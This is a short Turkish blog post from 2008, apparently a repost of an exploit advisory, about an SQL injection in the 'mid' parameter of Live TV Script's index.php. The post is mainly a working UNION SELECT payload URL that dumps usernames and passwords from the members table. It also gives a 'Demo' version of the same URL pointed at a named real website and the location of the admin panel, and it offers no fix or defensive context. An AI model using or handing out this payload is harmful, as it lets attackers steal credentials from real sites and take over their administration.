Live TV Script (index.php mid) SQL Injection Vulnerability

9 Eylül 2008 Salı

Live TV Script (index.php mid) SQL Injection Vulnerability

Live TV Script (index.php mid) SQL Injection Vulnerability

Discovered By: ZoRLu

orjinal bug:

http://www.milw0rm.com/exploits/6404

Exploit :

http://localhost/script_path/index.php?mid=32+union+select+0,concat(username,0x3a,password),2,3+from+members--

Demo:

http://indiaportal.org/demo/index.php?mid=32+union+select+0,concat(username,0x3a,password),2,3+from+members--

Admin Panel:

http://localhost/script_path/siteadmin/

ZoRLu | ZRL | Buffer Overflow

9 Eylül 2008 Salı

Live TV Script (index.php mid) SQL Injection Vulnerability

0 yorum:

About Me

Blog Archive

İzleyiciler

Bağlantılarım

Inj3ct0r.com